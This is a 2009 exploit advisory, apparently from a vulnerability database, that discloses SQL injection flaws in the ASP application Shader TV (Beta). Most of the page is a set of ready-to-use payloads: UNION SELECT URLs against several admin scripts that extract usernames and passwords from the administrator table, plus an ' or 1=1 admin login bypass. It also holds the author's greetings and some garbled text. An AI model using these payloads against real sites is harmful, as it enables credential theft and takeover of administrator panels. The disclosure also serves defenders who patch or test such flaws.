Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities

2009.04.10
Credit: U238
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Shader TV (Beta) Multiple Remote SQL İnjection Vulnerable Script : http://www.aspindir.com/indir.asp?ID=5441 Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html Coded : Asp Lnguae : Acces Discovered By U238 | < Ugurcan Engin > Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz : Web - Designer Solution Developer setuid.noexec0x1@hotmail.com http://noexec.blogspot.com 0x1 = [S** Says : Allah Belan&#177; Versin Ulan &#197;&#65533;iz0 !] 0x2 = [Ben Sadece İyi Bir İnsan Olmak İstemistim ] Exploit: Administrator Login to creative web panel is atack of to SQL injectin. http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici ---- http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1 http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1 ---- http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici Administrator Panel : target/ShaderTV/yonet ------------------------------- Admin Panel Login Bypass : target/ShaderTV/yonet/default.asp username : 'or' 1=1 password : 'or' 1=1 This is Admin Panel See You ? ---------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top